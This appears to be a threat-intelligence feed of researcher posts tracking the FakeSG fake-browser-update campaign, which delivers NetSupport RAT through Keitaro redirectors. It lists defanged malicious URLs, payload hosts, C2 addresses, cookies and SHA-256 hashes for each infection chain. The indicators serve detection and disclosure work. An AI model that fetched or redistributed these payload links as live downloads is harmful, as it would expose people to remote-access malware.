Today's #FakeSG

https://tria.ge/240125-q8tdtahgdm/behavioral1

Some recent activity for #FakeSG. Timestamp on updmgpower.zip is Wed, 24 Jan 2024 11:02:27 GMT, so just a few hours old.

5.181.159[.]48/Downloads/updmgpower.zip
-->
vass[.]us/wp-content/uploads/2024/01/FaultDamage.zip

NetSupport
GatewayAddress 5[.]181.159.27:443
serial_no NSM165348

New #FakeSG

#RogueRaticate / #FakeSG delivering NetSupport RAT via Keitaro on kokokakalala[.]com:

hxxps[://]fastactionmedicalbilling[.]com/wp-content/uploads/dra/online(brswr_packageupd)0x1dscD[.]url (02f715934404288c08522ded41e5555dc4c931373e4f6b882b562a58ebc77586) ->
file[://]5[.]252[.]177[.]15@80/Downloads/packENGus-brswr[.]hta (912612f572df9256ef84ba30c9a5cd03befa4fedd48817e0d85de7ca30f2b75b)

NetSupport C2:
91.92.245[.]83:443

New #FakeSG #RogueRaticate keitaro host and cookie:

jagernaut[.]com
188.208.196[.]186

cookie: 03fe2

#FakeSG seems a bit quiet lately so digging around I stumbled into yet another site with multiple fakeupdates. At this site the #ParrotTDS is still operational and sent the potential user to #SocGholish

Does make you wonder if it's all the same actor just trying out very different approaches? They got a new employee who was tasked with trying something different.

¯_(ツ)_/¯

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
www.chrisrichardsauthor[.]com/wp-content/uploads/2017/10/upd-(cohort-M117ES).rar
-->
hXXp://79[.]110.48.214/Downloads/ClientStart[.]hta
-->
www.chrisrichardsauthor[.]com/wp-content/uploads/2017/09/ens-1594(msx).zip
-->
94[.]158.245.150:443 (NetSupport)

6a19eda1180cb66e013db974dda32968bd29d47257095bca99c01c50f6a0b868 upd-(cohort-M117ES).rar
51ab827a541737c3612f61ec35e7c824a8f6df3a1b800dd0748c3f5a9901bc98 ClientStart.hta
2c2c252d5fae28b23d1ee760ad6d9499573188c32ceb947df0da1a3600841ee2 ens-1594(msx).zip

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
moodi-wood[.]com/wp-content/uploads/sass/client(upd-v105.214.51).rar
-->
moodi-wood[.]com/wp-content/uploads/sass/KreosInc.zip
-->
94[.]158.245.150:443 (NetSupport)

c4923cd0534a46278c8467c3e6cb139ae44fb8a0d3b3e567bf80dad94ad605e7 client(upd-v105.214.51).rar
deef9b58009eedec781267660e50de1ae404656d0d4b556feead857cd94b8156 Install Updater (silent).hta
a1f48e0f4f93cb57e1af6fbab198711aaee02657316ae4d2a141ae95e20add00 KreosInc.zip

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
moodi-wood[.]com/wp-content/uploads/version(stable-en).url
-->
hXXp://79[.]110.48.214/Downloads/Client-Upd(download)XXXXXXXXXX[.]hta
-->
moodi-wood[.]com/wp-content/uploads/astra/DancingParty.zip
-->
94[.]158.245.150:443 (NetSupport)

b41d1123c42f33e2c242abbe16b7d45038b93c05d88abcd4b414460f02b00458 version(stable-en).url
76d18608efb2b29e6cd54fe6b4b984e78e7d3295bf392f853a2fb789fc11a59d Client-Upd(download)XXXXXXXXXX.hta
ccce27aa3f199c43fa83a1cd23336679e9d2a3d3b0f832486e850bd97a280e75 DancingParty.zip

Updated #FakeSG infection chain

Compromised site
-->
googlestates[.]com/pTskQ6 (Keitaro)
-->
moodi-wood[.]com/wp-content/uploads/elementor/newV(105-3-2123).zip
-->
moodi-wood[.]com/wp-content/uploads/astra/DancingParty.zip
-->
94[.]158.245.150:443 (NetSupport)

e3b1eefac82008d35e60b8f75341a8f272c0becb6fefd69d2119571a41bb0c37 newV(105-3-2123).zip
4a9f42167f399abfbb42a5ee4d52922eb3f7f1ce88d23824f01d13e50609b8b9 Start Updater (silent).hta
d38c05a7306ce8dd6439608a00b8515dfc1873e6e8b00d247dd23fe60fa7ed03 DancingParty.zip